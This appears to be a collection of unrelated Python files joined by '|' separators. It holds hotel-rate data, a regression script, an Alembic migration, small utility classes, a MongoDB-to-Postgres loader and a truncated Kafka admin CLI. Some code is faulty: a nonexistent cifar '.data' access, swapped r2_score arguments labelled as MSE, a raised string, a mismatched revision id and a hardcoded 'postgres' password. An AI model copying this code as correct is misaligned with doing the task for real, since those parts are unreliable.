"room_name": "Двухместные апартаменты (двуспальная кровать) (1 комната)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-5bfa5429-4b87-5ffd-8a3c-57baec18f6fe",
},
{
"daily_prices": ["136.05"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "9479.00",
"show_amount": "9479.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1579.83",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "9479.00",
"amount_show": "9479.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 1,
"club": 0,
},
"room_name": "Одноместный люкс",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 2,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "112.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-1cbed9af-d3ab-5ed0-b6ad-dd397ed6d79f",
},
{
"daily_prices": ["150.85"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "10510.00",
"show_amount": "10510.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1751.67",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "10510.00",
"amount_show": "10510.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 1,
"club": 0,
},
"room_name": "Одноместный номер Superior",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 3,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "124.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-81bfa660-c8c3-52f4-895a-a2ceafc9fa72",
},
],
}
]
},
}
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 17 10:37:19 2022
@author: kawta
"""
### Importing neccessary packages
import pandas as pd
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
## Nowww loading data from pythoon !!!
boston_dataset = datasets.load_boston()
boston_df = pd.DataFrame(boston_dataset.data)
boston_df.columns = boston_dataset.feature_names
boston_df.head()
#### Now loading data from python : Cifar10
cifar_dataset = tf.keras.datasets.cifar10.load_data()
cifar_df = pd.DataFrame(cifar_dataset.data)
### Load the dataset into Pandas Dataframe
boston_npy_target_column = np.asarray(boston_dataset.target)
boston_df['House_Price'] = pd.Series(boston_npy_target_column)
## Now separating predicators and response
predicators = boston_df.iloc[:, :-1]
response = boston_df.iloc[:, -1]
response.head()
#### Separaaaating the data iiin train and test
X_train, X_test, Y_train, Y_test = train_test_split(predicators, response, test_size=0.2)
print(X_train.shape)
print(X_test.shape)
##### Nooow Let's applying a normal linead reg
linearreg = LinearRegression()
linearreg.fit(X_train, Y_train)
## prediiicting on test
linearreg_prediction = linearreg.predict(X_test)
### let's calculate the MSE Mean squarred errrrrror
R_squared = r2_score(linearreg_prediction, Y_test)
print("R squared error on test set : ", R_squared)
## Nooow putting together the coef and their corresponding variable names
coef_df = pd.DataFrame()
coef_df["Column_Name"] = X_train.columns
coef_df["Coefficient_Value"] = pd.Series(linearreg.coef_)
print(coef_df.head(15))
plt.rcParams["figure.figsize"] = (15,6)
plt.bar(coef_df["Column_Name"], coef_df["Coefficient_Value"])
### import rrrridge regression library
from sklearn.linear_model import Ridge
#Now train the ffff model loool
ridgeRegressor = Ridge(alpha = 0.5) ##here setting alpha 1
ridgeRegressor.fit(X_train, Y_train)
y_predicted_ridge = ridgeRegressor.predict(X_test)
### Calculating MSE
R_squared = r2_score(y_predicted_ridge, Y_test)
print("R squared error on test set : ", R_squared)
## Nooow putting together the coef and their corresponding variable names
coef_df = pd.DataFrame()
coef_df["Column_Name"] = X_train.columns
coef_df["Coefficient_Value"] = pd.Series(ridgeRegressor.coef_)
print(coef_df.head(15))
plt.rcParams["figure.figsize"] = (15,6)
plt.bar(coef_df["Column_Name"], coef_df["Coefficient_Value"])
import seaborn as sns
plt.scatter(boston_df['LSTAT'], boston_df['House_Price'])
### import Lasso regression library
from sklearn.linear_model import Lasso
#Now train the ffff model loool
LassoRegressor = Lasso(alpha = 1) ##here setting alpha 1
LassoRegressor.fit(X_train, Y_train)
y_predicted_lasso = LassoRegressor.predict(X_test)
### Calculating MSE
R_squared = r2_score(y_predicted_lasso, Y_test)
print("R squared error on test set : ", R_squared)
## Nooow putting together the coef and their corresponding variable names
coef_df = pd.DataFrame()
coef_df["Column_Name"] = X_train.columns
coef_df["Coefficient_Value"] = pd.Series(LassoRegressor.coef_)
print(coef_df.head(15))
plt.rcParams["figure.figsize"] = (15,6)
plt.bar(coef_df["Column_Name"], coef_df["Coefficient_Value"])
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015-2019, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
"""internal and external layer tables refactoring, new ogc table
Revision ID: 116b9b79fc4d
Revises: 1418cb05921b
Create Date: 2015-10-28 12:21:59.162238
"""
from alembic import op
from sqlalchemy import ForeignKey, Column
from sqlalchemy.types import Integer, Boolean, Unicode
from c2c.template.config import config
# revision identifiers, used by Alembic.
revision = '116b9b79fc4d'
down_revision = 'a4f1aac9bda'
branch_labels = None
depends_on = None
def upgrade():
schema = config['schema']
# Instructions
op.create_table(
'server_ogc',
Column('id', Integer, primary_key=True),
Column('name', Unicode, nullable=False),
Column('description', Unicode),
Column('url', Unicode),
# url_wfs needed for Arcgis because wms and wfs url may be different
Column('url_wfs', Unicode),
Column('type', Unicode),
Column('image_type', Unicode),
Column('auth', Unicode),
Column('wfs_support', Boolean, server_default='false'),
Column('is_single_tile', Boolean, server_default='false'),
schema=schema,
)
op.create_table(
'layer_wms',
Column(
'id', Integer,
ForeignKey(schema + '.layer.id'), primary_key=True
),
Column(
'server_ogc_id', Integer,
ForeignKey(schema + '.server_ogc.id')
),
Column('layer', Unicode),
Column('style', Unicode),
Column('time_mode', Unicode, server_default='disabled', nullable=False),
Column('time_widget', Unicode, server_default='slider', nullable=False),
schema=schema,
)
# move data from layer_internal_wms and layer_external_wms to the new
# layer_wms and server_ogc tables
# ocg for internal
# default 'image/jpeg', 'image/png'
op.execute(
'INSERT INTO %(schema)s.server_ogc (name, description, type, image_type, '
" auth, wfs_support) "
"SELECT 'source for ' || image_type AS name, "
" 'default source for internal ' || image_type AS description, "
" 'mapserver' AS type, "
" image_type, "
" 'Standard auth' AS auth, "
" 'true' AS wfs_support "
"FROM ("
" SELECT UNNEST(ARRAY['image/jpeg', 'image/png']) AS image_type"
") AS foo" % {
'schema': schema,
}
)
# other custom image types
op.execute(
'INSERT INTO %(schema)s.server_ogc (name, description, type, image_type, '
" auth, wfs_support) "
"SELECT 'source for ' || image_type AS name, "
" 'default source for internal ' || image_type AS description, "
" 'mapserver' AS type, "
" image_type, "
" 'Standard auth' AS auth, "
" 'true' AS wfs_support "
"FROM ("
" SELECT DISTINCT(image_type) FROM %(schema)s.layer_internal_wms "
" WHERE image_type NOT IN ('image/jpeg', 'image/png')"
") as foo" % {
'schema': schema,
}
)
# layers for internal
# internal with not null image_type
op.execute(
'INSERT INTO %(schema)s.layer_wms (id, server_ogc_id, layer, style, '
' time_mode, time_widget) '
'SELECT lew.id, so.id, layer, style, time_mode, time_widget '
'FROM %(schema)s.layer_internal_wms AS lew, %(schema)s.server_ogc AS so '
'WHERE lew.image_type=so.image_type AND so.type IS NOT NULL' % {
'schema': schema,
}
)
# internal with null image_type
op.execute(
'INSERT INTO %(schema)s.layer_wms (id, server_ogc_id, layer, style, '
' time_mode, time_widget) '
'SELECT lew.id, so.id, layer, style, time_mode, time_widget '
'FROM %(schema)s.layer_internal_wms AS lew, %(schema)s.server_ogc AS so '
"WHERE lew.image_type IS NULL AND so.image_type='image/png'" % {
'schema': schema,
}
)
# ocg for externals
op.execute(
'INSERT INTO %(schema)s.server_ogc (name, url, type, image_type, auth, is_single_tile) '
"SELECT 'source for ' || url, url, 'mapserver' AS type, image_type, 'none', CASE "
'WHEN is_single_tile IS TRUE THEN TRUE ELSE FALSE END as is_single_tile '
'FROM %(schema)s.layer_external_wms GROUP BY url, image_type, is_single_tile' % {
'schema': schema,
}
)
# layers for external
op.execute(
'INSERT INTO %(schema)s.layer_wms (id, server_ogc_id, layer, style, '
' time_mode, time_widget) '
'SELECT lew.id, so.id, layer, style, time_mode, time_widget '
'FROM %(schema)s.layer_external_wms as lew, %(schema)s.server_ogc as so '
'WHERE lew.url=so.url AND lew.is_single_tile=so.is_single_tile '
'AND lew.image_type=so.image_type' % {
'schema': schema,
}
)
op.drop_table('layer_external_wms', schema=schema)
op.drop_table('layer_internal_wms', schema=schema)
# update layer type in treeitems
op.execute(
'UPDATE %(schema)s.treeitem '
"SET type='l_wms' "
"WHERE type='l_int_wms' OR type='l_ext_wms'" % {
'schema': schema,
}
)
def downgrade():
schema = config['schema']
# Instructions
# recreate tables 'layer_internal_wms' and 'layer_external_wms'
op.create_table(
'layer_internal_wms',
Column(
'id', Integer, ForeignKey(schema + '.layer.id'), primary_key=True
),
Column('layer', Unicode),
Column('image_type', Unicode(10)),
Column('style', Unicode),
Column('time_mode', Unicode(8)),
Column('time_widget', Unicode(10), server_default='slider'),
schema=schema,
)
op.create_table(
'layer_external_wms',
Column(
'id', Integer, ForeignKey(schema + '.layer.id'), primary_key=True
),
Column('url', Unicode),
Column('layer', Unicode),
Column('image_type', Unicode(10)),
Column('style', Unicode),
Column('is_single_tile', Boolean),
Column('time_mode', Unicode(8)),
Column('time_widget', Unicode(10), server_default='slider'),
schema=schema,
)
# move data back
# internal (type is not null)
op.execute(
'INSERT INTO %(schema)s.layer_internal_wms (id, layer, image_type, style, '
' time_mode, time_widget) '
'SELECT w.id, layer, image_type, style, time_mode, time_widget '
'FROM %(schema)s.layer_wms AS w, %(schema)s.server_ogc AS o '
'WHERE w.server_ogc_id=o.id AND o.type IS NOT NULL' % {
'schema': schema,
}
)
# external (type is null)
op.execute(
'INSERT INTO %(schema)s.layer_external_wms (id, url, layer, image_type, style, '
' is_single_tile, time_mode, time_widget) '
'SELECT w.id, url, layer, image_type, style, is_single_tile, time_mode, time_widget '
'FROM %(schema)s.layer_wms AS w, %(schema)s.server_ogc AS o '
'WHERE w.server_ogc_id=o.id AND o.type IS NULL' % {
'schema': schema,
}
)
# drop table AFTER moving data back
op.drop_table('layer_wms', schema=schema)
op.drop_table('server_ogc', schema=schema)
# update layer type in treeitems
# internal
op.execute(
"UPDATE %(schema)s.treeitem "
"SET type='l_int_wms' "
"FROM %(schema)s.layer_internal_wms as w "
"WHERE %(schema)s.treeitem.id=w.id" % {
'schema': schema,
}
)
# external
op.execute(
"UPDATE %(schema)s.treeitem "
"SET type='l_ext_wms' "
"FROM %(schema)s.layer_external_wms as w "
"WHERE %(schema)s.treeitem.id=w.id" % {
'schema': schema,
}
)
|
x = 40
y = 30
print('x + y =', x + y) # 70
print('x - y =', x - y) # 10
print('x * y =', x * y) # 1200
print('x / y =', x / y) # 1.333
print('x // y =', x // y) # 1 => Floor division (quotient)
print('x % y =', x % y) # 10
# 1152921504606846976000000000000000000000000000000 => x ^ y
print('x ** y =', x**y)
|
"""
[12/23/13] Challenge #130 [Hard] Coloring France's Departments
https://www.reddit.com/r/dailyprogrammer/comments/1tj0kl/122313_challenge_130_hard_coloring_frances/
# [](#HardIcon) *(Hard)*: Coloring France's Departments
The European country of [France](http://en.wikipedia.org/wiki/France) is segmented into many different
[departments](http://en.wikipedia.org/wiki/Departments_of_France); 96 in the main continent with a few others overseas.
Wikipedia, as always, has a great [visualization of these departments with their respective unique numbers
here](http://upload.wikimedia.org/wikipedia/commons/b/b2/D%C3%A9partements_de_France_English.svg).
Some departments, like 66 (Pyrénées-Orientales), are only bordered by two other departments. Others, like department
87, are surrounded by much more (6 in this example). Your goal is to color a map of these regions with two
requirements: 1) make sure that each adjacent department do not share a color, so you can clearly distinguish each
department, and 2) minimize these numbers of colors.
The input will be a variation of the list of French departments, represented as an [adjacency
list](http://en.wikipedia.org/wiki/Adjacency_list). This challenge is essentially solving for [Graph
coloring](http://en.wikipedia.org/wiki/Graph_coloring), where you must print each department's color (a unique integer).
# Formal Inputs & Outputs
## Input Description
On standard console input, you will be given an integer N which represents the following N-lines of an adjacency list.
These lines of data will always be in the format of integers A B C D ... where A is the source node / vertex that
points to vertices B C D... etc. Remember that this data really means that A is the ID of a department, and B C D ...
are the bordering departments.
Writing up the French department list as an adjacency list is very tedious; feel free to only work on a subset.
## Output Description
For each given node (a department), print the unique color identifier after it. A color identifier is unique integer,
starting from 0, that represents a unique color. Remember that bordering departments (e.g. adjacent nodes) cannot have
the same color index!
# Sample Inputs & Outputs
## Sample Input
*Note that this list only contains 8 departments from the south-western corner of France as an example*
8
64 40 32 65
65 64 32 31
31 65 32 82 81 11 9
9 31 11 66
66 9 11
40 33 47 32 64
32 40 47 82 31 65 64
11 31 81 34 66 9
## Sample Output
64 0
65 1
31 0
9 1
66 0
40 1
32 2
11 2
# Challenge++:
If you want to go above and beyond for this challenge, programmatically draw a map of the French departments with
actual colors from your unique set (you may randomly pick them or use a [color
palette](http://en.wikipedia.org/wiki/Palette_(computing\))). Feel free to use the linked SVG file from Wikipedia,
since it can be modified through text / XML manipulation.
"""
def main():
pass
if __name__ == "__main__":
main()
|
from errno import ENOENT
from os import path
import six
from .html_elements import InputCollection
from .input import Input
from ..meta_elements import MetaHTMLElement
@six.add_metaclass(MetaHTMLElement)
class FileField(Input):
def set(self, filepath):
"""
Set the file field to the given path
:param filepath: path to the file
:raises: ENOENT
"""
if not path.exists(filepath):
raise OSError(ENOENT, '{!r} does not exist.'.format(filepath))
self.value = filepath
@property
def value(self):
"""
Gets teh value of the file field
:rtype: str
"""
return self.attribute_value('value')
@value.setter
def value(self, filepath):
"""
Set the file field to the given path
:param filepath: path to the file
"""
self._element_call(lambda: self.el.send_keys(filepath))
@six.add_metaclass(MetaHTMLElement)
class FileFieldCollection(InputCollection):
pass
|
from LinkedList import *
from collections import *
class Queue:
''' This class defines a queue data structure '''
def __init__(self):
''' __init__ method initializing the queue '''
self.queue = list()
def enqueue(self, item):
''' Method to perform the enqueue operation on the queue '''
if item != None:
self.queue.insert(0, item)
else:
raise Exception
def getSize(self):
''' This method returns the size of the queue '''
return self.queue.__len__()
def queuePop(self):
''' Method to perform the dequeue operation on the queue '''
if self.queue.__len__() > 0:
return self.queue.pop()
else:
raise "No elements in queue"
def peek(self):
''' Method to perform a peek operation on the queue '''
if self.queue.__len__() == 0:
return -1
return self.queue
|
"""
This file reads the documents with specified values from the MongoDB, and readies them for insertion into the
Postgres schema. This is a separate class, since we want to avoid running it with every try/experimentation over
the 'regular' schema, which could potentially have several reworks. The stored documents, on the other hand,
should be relatively fixed, and not require constant reworks.
Some words on the naming convention: The name from the 'articles' table in MongoDB was renamed to 'documents', since
this is the common phrase used in the paper, as well as the context of 'document collections'.
"""
from MongoConnector import MongoConnector
from PostgresConnector import PostgresConnector
from utils import set_up_logger, check_table_existence
from psycopg2 import ProgrammingError, IntegrityError
from psycopg2.extras import execute_values
import os
import time
import logging
from collections import OrderedDict
class DocumentGenerator:
def __init__(self,
fields=OrderedDict({"_id":"document_id",
"title":"title",
"feedName":"feedName",
"category":"category",
"feedURL":"feedURL",
"published":"published"
}),
num_distinct_documents=0,
document_table_name="documents",
database="postgres",
user="postgres",
password="postgres",
host="127.0.0.1",
port=5435,
log_file=os.path.join(os.path.dirname(__file__), "logs/DocumentGenerator.log"),
log_level=logging.INFO,
log_verbose=True
):
"""
Initializes context, and sets up documents that will be parsed.
Also establishes the PostgresConnector that will later be used to push the retrieved documents.
:param fields: (OrderedDict) Key-value pairs that indicate a mapping of fields that should be retrieved (key),
and the respective field it should be called in the SQL table. Ordered because SQL tables are.
:param num_distinct_documents: (int) As the name indicates, the number of distinct articles that should be used.
Mainly for debugging purposes. 0 means all documents will be used, in accordance with MongoDB standards.
:param document_table_name: (str) Name of the Postgres table that should contain the documents
:param database: (str) database name.
:param user: (str) User name to get access to the Postgres database.
:param password: (str) Corresponding user password.
:param host: (IP) IP address (in string format) for the host of the postgres database.
:param port: (integer) Port at which to access the database.
:param log_file: (os.path) Path to the file containing the logs.
:param log_level: (logging.LEVEL) Specifies the level to be logged.
:param log_verbose: (boolean) Specifies whether or not to look to stdout as well.
"""
# set up logger
self.logger = set_up_logger(__name__, log_file, log_level, log_verbose)
self.logger.info("Successfully registered logger to DocumentGenerator.")
# register a MongoConnector
self.mc = MongoConnector()
self.logger.info("Successfully registered MongoConnector to DocumentGenerator.")
self.num_distinct_documents = num_distinct_documents
# get the distinct IDs for the documents so we can match against them later
if self.num_distinct_documents != 0:
self.logger.info("Non-zero limit detected. Fetching first N distinct document IDs now...")
with self.mc as open_mc:
documents = open_mc.client[open_mc.news].articles
self.first_documents = list(documents.find().limit(self.num_distinct_documents))
# for small enough number, and large enough document collection, this is more efficient:
self.first_documents = [el["_id"] for el in self.first_documents]
self.logger.info("Successfully registered relevant document IDs.")
else:
# needed to avoid later conflicts
self.first_documents = []
# set up PostgresConnector. Since we only use these once, I don't see any reason to store the connection
# details locally again.
self.pc = PostgresConnector(database, user, password, host, port)
self.logger.info("Successfully registered PostgresConnector to DocumentGenerator.")
# format them into a reasonable format
self.fields = fields
if not self.fields:
self.logger.error("No fields for MongoDB table specified!")
self.values_to_retrieve = {key: 1 for key in self.fields.keys()}
# suppress _id if not wanted, as it is returned by default.
if "_id" not in self.values_to_retrieve.keys():
self.values_to_retrieve["_id"] = 0
# TODO
self.sql_format = ", ".join([value for value in self.fields.values()])
self.document_table_name = document_table_name
# preparation for later. According to PEP8
self.data = []
self.logger.info("Successfully set up DocumentGenerator.")
def retrieve(self):
"""
Get values from MongoDB ready for offline processing, and later insertion. So far the software pattern for
the insertion into Postgres is unclear, but will likely also be done in that class. Hopefully the design of the
PostgresConnector holds up so that we do not have to duplicate several elements.
:return: (None) Internally generates the value tuples required for insertion into Postgres.
"""
self.logger.info("Starting to retrieve documents from MongoDB...")
start_time = time.time()
with self.mc as open_mc:
documents = open_mc.client[open_mc.news].articles
if self.first_documents:
self.data = list(documents.find({"_id": {"$in": self.first_documents}}, self.values_to_retrieve))
else:
# self.first_documents will be empty if no limit is specified!
self.data = list(documents.find({}, self.values_to_retrieve))
# get out of dictionary key structure:
self.data = [list(el.values()) for el in self.data]
end_time = time.time()
self.logger.info("Successfully retrieved relevant documents in {:.4f} s.".format(end_time - start_time))
def push(self):
"""
Pushes a previously collected series of documents from the local store to a Postgres table, as per the defined
schema. This should also check that the documents have been actually retrieved before.
:return: (None) Fills up the (remote) postgres table.
"""
self.logger.info("Starting to push values into the Postgres table...")
if not self.data:
self.logger.error("No data found to be pushed! Please call .retrieve() first!")
return 0
with self.pc as open_pc:
if not check_table_existence(self.logger, open_pc, self.document_table_name):
return 0
self.logger.info("Found document table.")
self.logger.info("Inserting values.")
# build query
start_time = time.time()
try:
execute_values(open_pc.cursor,
"INSERT INTO {} ({}) VALUES %s".format(self.document_table_name, self.sql_format),
self.data)
end_time = time.time()
self.logger.info("Successfully inserted values in {:.4f} s".format(end_time - start_time))
except IntegrityError as err:
self.logger.error("Values with previously inserted primary key detected!\n {}".format(err))
return 0
def clear(self):
"""
Deletes previously inserted documents from the table.
:return: (None). Calls Postgres table with prepared DELETE-statement.
"""
with self.pc as open_pc:
if not check_table_existence(self.logger, open_pc, self.document_table_name):
return 0
self.logger.info("Found document table.")
self.logger.info("Deleting all previously inserted documents...")
open_pc.cursor.execute("DELETE FROM {}".format(self.document_table_name))
# TODO: Check whether document count is actually 0!
self.logger.info("Successfully deleted all previously inserted documents.")
def remove_spike(self):
"""
Manual deletion of the exceptionally high volume on the two dates of 18th and 28th of August 2016.
:return: (None)
"""
with self.pc as open_pc:
if not check_table_existence(self.logger, open_pc, self.document_table_name):
return 0
self.logger.info("Found document table.")
start = time.time()
self.logger.info("Deleting all previously inserted documents...")
open_pc.cursor.execute("DELETE FROM {} " \
"WHERE ((published >= '2016-08-18 10:00:00' AND published < '2016-08-18 12:00:00') "
"OR (published >= '2016-08-28 10:00:00' AND published < '2016-08-28 12:00:00') "
"OR (published >= '2016-08-18 14:00:00' AND published < '2016-08-18 17:00:00') "
"OR (published >= '2016-08-28 14:00:00' AND published < '2016-08-28 17:00:00')) "
"AND feedName = 'WP'".format(self.document_table_name))
end = time.time()
self.logger.info("Successfully deleted all documents during the peak time in {:.4f} s.".format(end-start))
if __name__ == "__main__":
dg = DocumentGenerator()
dg.retrieve()
# print(dg.data)
print(dg.data[0])
dg.clear()
dg.push()
|
#!/usr/bin/env python3
import json
import logging
import sys
import time
import click
import requests
from requests import Response
from bubuku.features.remote_exec import RemoteCommandExecutorCheck
from bubuku.utils import get_opt_broker_id, prepare_configs, is_cluster_healthy, get_max_bytes_in
from bubuku.zookeeper import load_exhibitor_proxy, BukuExhibitor, RebalanceThrottleManager
_LOG = logging.getLogger('bubuku.cli')
def _print_table(table: list, print_function=None):
if not print_function:
print_function = print
names = sorted(set([v for v in sum([list(k.keys()) for k in table], [])]))
lengths = {n: len(n) for n in names}
for d in table:
for k, v in d.items():
if lengths[k] < len(str(v)):
lengths[k] = len(str(v))
format_string = ' '.join(['{!s:' + str(lengths[n]) + 's}' for n in names])
print_function(format_string.format(*names))
for item in table:
print_function(format_string.format(*[item.get(n, '') for n in names]))
def __validate_not_empty(ctx, param, value):
if not value:
raise click.BadParameter('Parameter must have value')
return value
def __check_all_broker_ids_exist(broker_ids: list, zk: BukuExhibitor):
registered_brokers = zk.get_broker_ids()
unknown_brokers = [broker_id for broker_id in broker_ids if broker_id not in registered_brokers]
if len(unknown_brokers) == 1:
raise Exception('1 broker id is not valid: {}'.format(unknown_brokers[0]))
if len(unknown_brokers) > 1:
raise Exception('{} broker ids are not valid: {}'.format(len(unknown_brokers), ",".join(unknown_brokers)))
logging.basicConfig(level=getattr(logging, 'INFO', None))
@click.group()
def cli():
logo = """
____ __ __
/ __ )__ __/ /_ __ __/ /____ __
/ __ / / / / __ \/ / / / //_/ / / /
/ /_/ / /_/ / /_/ / /_/ / ,< / /_/ /
/_____/\__,_/_.___/\__,_/_/|_|\__,_/
"""
sys.stderr.write(logo + "\nStart, monitor and rebalance kafka cluster in AWS setup\n")
def _dump_replica_assignment_as_json(assignment: list) -> str:
json_element = {
"version": 1,
"partitions": [{'topic': v[0], 'partition': int(v[1])} for v in assignment]
}
return json.dumps(json_element, separators=(',', ':'))
@cli.command('preferred-replica-election',
help='Do preferred replica election, as command line tool from kafka have a number of limitations. '
'Only partitions, that are improperly allocated will be affected. In case if size of resulting json '
'is too big, it will be split into several parts, and they will be executed one after another.')
@click.option('--dry-run', is_flag=True, help="Do not apply the changes. Instead just prepare json file(s)")
@click.option('--max-json-size', type=click.INT, default=512000,
help="Maximum size of json data in bytes to write to zk", show_default=True)
def trigger_preferred_replica_election(dry_run: bool, max_json_size: int):
config, env_provider = prepare_configs()
with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
partitions_state = {}
for topic, partition, state in zookeeper.load_partition_states():
partitions_state[(topic, partition)] = state
wrong_assignment = []
for topic, partition, replica_list in zookeeper.load_partition_assignment():
key = (topic, partition)
if not replica_list:
_LOG.warning('Replica list is not defined for %s', key)
continue
if key not in partitions_state:
_LOG.warning("Topic partition %s is not found in active states list. will skip it", key)
continue
leader = partitions_state[key].get('leader')
if leader is None:
_LOG.warning('Current leader is not defined for ')
continue
expected_leader = replica_list[0]
if leader != expected_leader:
_LOG.info("Found incorrect assignment: %s, leader is %d, but should be the first one in %s",
key, leader, replica_list)
wrong_assignment.append(key)
if dry_run:
print(_dump_replica_assignment_as_json(wrong_assignment))
else:
while wrong_assignment:
items_to_take = len(wrong_assignment)
change_applied = False
while not change_applied:
payload = _dump_replica_assignment_as_json(wrong_assignment[:items_to_take])
payload_bytes = payload.encode('utf-8')
if len(payload_bytes) > max_json_size:
new_items_to_take = int(items_to_take / 2)
_LOG.info("Not fitting to %d bytes with %d items, will try %d items",
max_json_size, items_to_take, new_items_to_take)
items_to_take = new_items_to_take
if items_to_take <= 0:
_LOG.error("Incorrect configuration - even one key is not fitting to proposed size %d. "
"Stop playing and do the job!", max_json_size)
exit(1)
continue
_LOG.info("Applying %s", payload)
zookeeper.exhibitor.create('/admin/preferred_replica_election', payload_bytes)
while zookeeper.exhibitor.is_node_present('/admin/preferred_replica_election'):
_LOG.info("Waiting for node to disappear")
time.sleep(1)
change_applied = True
del wrong_assignment[:items_to_take]
_LOG.info("Done with assignment")
@cli.command('restart', help='Restart kafka instance')
@click.option('--broker', type=click.STRING,
help='Broker id to restart. By default current broker id is restarted')
def restart_broker(broker: str):
config, env_provider = prepare_configs()
with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
broker_id = get_opt_broker_id(broker, config, zookeeper, env_provider)
RemoteCommandExecutorCheck.register_restart(zookeeper, broker_id)
@cli.command('rolling-restart', help='Rolling restart of Kafka cluster')
@click.option('--image-tag', type=click.STRING, help='Docker image to run Kafka broker')
@click.option('--instance-type', type=click.STRING, required=True, help='AWS instance type to run Kafka broker on')
@click.option('--scalyr-key', type=click.STRING, help='Scalyr account key')
@click.option('--scalyr-region', type=click.STRING, help='Scalyr region to use')
@click.option('--kms-key-id', type=click.STRING, help='Kms key id to decrypt data with')
@click.option('--cool-down', type=click.INT, default=600, show_default=True,
help='Number of seconds to wait before passing the restart task to another broker, after cluster is '
'stable. Default value of 10 minutes is recommended for production in order to give consumers '
'enough time to stabilize in between restarts. This is particularly important for KStream '
'applications')
def rolling_restart_broker(image_tag: str, instance_type: str, scalyr_key: str, scalyr_region: str, kms_key_id: str,
cool_down: int):
if not is_cluster_healthy():
print('Cluster is not healthy, try again later :)')
return
config, env_provider = prepare_configs()
with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
broker_id = get_opt_broker_id(None, config, zookeeper, env_provider)
RemoteCommandExecutorCheck.register_rolling_restart(zookeeper, broker_id, image_tag, instance_type, scalyr_key,
scalyr_region, kms_key_id, cool_down)
@cli.command('rebalance', help='Run rebalance process on one of brokers. If rack-awareness is enabled, replicas will '
'only be move to other brokers in the same rack')
@click.option('--broker', type=click.STRING,
help="Broker instance on which to perform rebalance. By default, any free broker will start it")
@click.option('--empty_brokers', type=click.STRING,
help="Comma-separated list of brokers to empty. All partitions will be moved to other brokers")
@click.option('--exclude_topics', type=click.STRING, help="Comma-separated list of topics to exclude from rebalance")
@click.option('--bin-packing', is_flag=True, help="Use bean packing approach instead of one way processing")
@click.option('--parallelism', type=click.INT, default=1, show_default=True,
help="Amount of partitions to move in a single rebalance step")
@click.option('--throttle', type=click.INT, default=100000000, help="Upper bound on bandwidth (in bytes/sec) used for "
"rebalance")
@click.option('--remove-throttle', is_flag=True, help="Don't trigger rebalance but remove throttling "
"configuration from all the brokers and topics")
def rebalance_partitions(broker: str, empty_brokers: str, exclude_topics: str, parallelism: int, bin_packing: bool,
